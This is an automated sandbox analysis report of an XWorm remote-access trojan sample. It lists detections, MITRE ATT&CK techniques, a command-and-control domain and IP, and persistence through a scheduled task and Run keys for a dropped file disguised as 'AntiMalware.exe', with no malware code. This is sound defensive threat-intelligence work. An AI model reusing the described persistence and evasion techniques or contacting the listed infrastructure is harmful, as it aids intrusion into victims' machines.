                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2859205703.000000001C261000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: KJhsNv2RcI.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.KJhsNv2RcI.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2822437837.000000000334A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2822437837.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1669945553.0000000000E72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: KJhsNv2RcI.exe PID: 7356, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: KJhsNv2RcI.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.KJhsNv2RcI.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2822437837.000000000334A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2822437837.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1669945553.0000000000E72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: KJhsNv2RcI.exe PID: 7356, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Create Account                    		12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory23
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Obfuscated Files or Information                    		Security Account Manager541
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron21
                    Registry Run Keys / Startup Folder                    		21
                    Registry Run Keys / Startup Folder                    		2
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets151
                    Virtualization/Sandbox Evasion                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Modify Registry                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579063 Sample: KJhsNv2RcI.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 40 analysis-warming.gl.at.ply.gg 2->40 42 ip-api.com 2->42 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 14 other signatures 2->54 8 KJhsNv2RcI.exe 17 5 2->8         started        13 AntiMalware.exe 2->13         started        15 AntiMalware.exe 2->15         started        17 AntiMalware.exe 2->17         started        signatures3 process4 dnsIp5 44 analysis-warming.gl.at.ply.gg 147.185.221.24, 13548, 49764 SALSGIVERUS United States 8->44 46 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->46 38 C:\Users\user\AppData\...\AntiMalware.exe, PE32 8->38 dropped 58 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->58 60 Protects its processes via BreakOnTermination flag 8->60 62 Bypasses PowerShell execution policy 8->62 70 4 other signatures 8->70 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 64 Antivirus detection for dropped file 13->64 66 Multi AV Scanner detection for dropped file 13->66 68 Machine Learning detection for dropped file 13->68 file6 signatures7 process8 signatures9 56 Loading BitLocker PowerShell Module 19->56 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    KJhsNv2RcI.exe84%ReversingLabsWin32.Exploit.XWorm
                    KJhsNv2RcI.exe100%AviraHEUR/AGEN.1305769
                    KJhsNv2RcI.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\AntiMalware.exe100%AviraHEUR/AGEN.1305769
                    C:\Users\user\AppData\Roaming\AntiMalware.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\AntiMalware.exe84%ReversingLabsWin32.Exploit.XWorm

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    		208.95.112.1
                    		truefalse
                      		high
                      analysis-warming.gl.at.ply.gg
                      		147.185.221.24
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        analysis-warming.gl.at.ply.ggtrue
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1775201853.0000022537C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876405149.0000029D3E0A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2029842687.000001BB70364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.micropowershell.exe, 00000004.00000002.1889320195.0000029D46419000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1758294326.0000022527DFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819001426.0000029D2E258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929254330.000001BB60519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1758294326.0000022527DFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819001426.0000029D2E258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929254330.000001BB60519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000B.00000002.2342826080.000001F3C6C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/powershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1775201853.0000022537C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876405149.0000029D3E0A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2029842687.000001BB70364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.newtonsoft.com/jsonschemaKJhsNv2RcI.exe, 00000000.00000002.2865773480.000000001D600000.00000004.08000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.micpowershell.exe, 00000001.00000002.1787761477.000002254034F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.nuget.org/packages/Newtonsoft.Json.BsonKJhsNv2RcI.exe, 00000000.00000002.2865773480.000000001D600000.00000004.08000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.micft.cMicRosofpowershell.exe, 00000001.00000002.1787761477.000002254034F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1758294326.0000022527BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819001426.0000029D2E031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929254330.000001BB602F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2119318876.000001F3AE6A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.microsoft.cpowershell.exe, 00000009.00000002.2054985754.000001BB78A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.micro.compowershell.exe, 00000004.00000002.1889320195.0000029D46419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKJhsNv2RcI.exe, 00000000.00000002.2822437837.0000000003301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1758294326.0000022527BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819001426.0000029D2E031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929254330.000001BB602F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2119318876.000001F3AE6A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://james.newtonking.com/projects/jsonKJhsNv2RcI.exe, 00000000.00000002.2865773480.000000001D600000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      208.95.112.1
                                                                      		ip-api.comUnited States
                                                                      		53334TUT-ASUSfalse
                                                                      147.185.221.24
                                                                      		analysis-warming.gl.at.ply.ggUnited States
                                                                      		12087SALSGIVERUStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1579063
                                                                      Start date and time:2024-12-20 18:57:08 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 47s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:19
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:
                                                                      Sample name:KJhsNv2RcI.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:2bd38b201c0c2fd95fcdc6824cdce1952ae7ed0b89f1ee52be2a27341903318c.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.rans.troj.evad.winEXE@19/20@2/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 12.5%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 82
                                                                      • Number of non-executed functions: 6
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Connection to analysis system has been lost, crash info: Unknown
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target AntiMalware.exe, PID 6032 because it is empty
                                                                      • Execution Graph export aborted for target AntiMalware.exe, PID 7568 because it is empty
                                                                      • Execution Graph export aborted for target AntiMalware.exe, PID 8044 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 4480 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7488 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7732 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 8068 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • VT rate limit hit for: KJhsNv2RcI.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      12:58:05API Interceptor61x Sleep call for process: powershell.exe modified
                                                                      12:59:11API Interceptor30x Sleep call for process: KJhsNv2RcI.exe modified
                                                                      17:59:10Task SchedulerRun new task: AntiMalware path: C:\Users\user\AppData\Roaming\AntiMalware.exe
                                                                      17:59:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AntiMalware C:\Users\user\AppData\Roaming\AntiMalware.exe
                                                                      17:59:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AntiMalware C:\Users\user\AppData\Roaming\AntiMalware.exe
                                                                      17:59:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AntiMalware.lnk

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      208.95.112.1doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      dlhost.exeGet hashmaliciousXWormBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                      • ip-api.com/json
                                                                      xt.exeGet hashmaliciousXWormBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                      • ip-api.com/json
                                                                      roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                      • ip-api.com/json
                                                                      random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                      • ip-api.com/json
                                                                      x.ps1Get hashmaliciousQuasarBrowse
                                                                      • ip-api.com/json/
                                                                      Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • ip-api.com/json/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ip-api.comdoc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      dlhost.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                      • 208.95.112.1
                                                                      xt.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                      • 208.95.112.1
                                                                      roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                      • 208.95.112.1
                                                                      random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                      • 208.95.112.1
                                                                      x.ps1Get hashmaliciousQuasarBrowse
                                                                      • 208.95.112.1
                                                                      https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                                      • 208.95.112.2

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      TUT-ASUSdoc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      dlhost.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                      • 208.95.112.1
                                                                      xt.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                      • 208.95.112.1
                                                                      roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                      • 208.95.112.1
                                                                      random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                      • 208.95.112.1
                                                                      x.ps1Get hashmaliciousQuasarBrowse
                                                                      • 208.95.112.1
                                                                      SALSGIVERUSPjGz899RZV.exeGet hashmaliciousXWormBrowse
                                                                      • 147.185.221.24
                                                                      ehxF3rusxJ.exeGet hashmaliciousXWormBrowse
                                                                      • 147.185.221.24
                                                                      loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 147.184.134.130
                                                                      Client-built-Playit.exeGet hashmaliciousQuasarBrowse
                                                                      • 147.185.221.24
                                                                      PowerRat.exeGet hashmaliciousAsyncRATBrowse
                                                                      • 147.185.221.211
                                                                      file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                      • 147.185.221.24
                                                                      msedge.exeGet hashmaliciousXWormBrowse
                                                                      • 147.185.221.22
                                                                      imagelogger.exeGet hashmaliciousXWormBrowse
                                                                      • 147.185.221.229
                                                                      NJRAT DANGEROUS.exeGet hashmaliciousXWormBrowse
                                                                      • 147.185.221.181
                                                                      com surrogate.exeGet hashmaliciousXWormBrowse
                                                                      • 147.185.221.22

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AntiMalware.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\AntiMalware.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):654
                                                                      Entropy (8bit):5.380476433908377
                                                                      Encrypted:false
                                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2oehj3s3.jxg.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qmd2q5e.u25.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wrwg4ow.nq0.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2o1wlno.zn3.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebja5hp2.aq0.psm1

                                                                      Download File
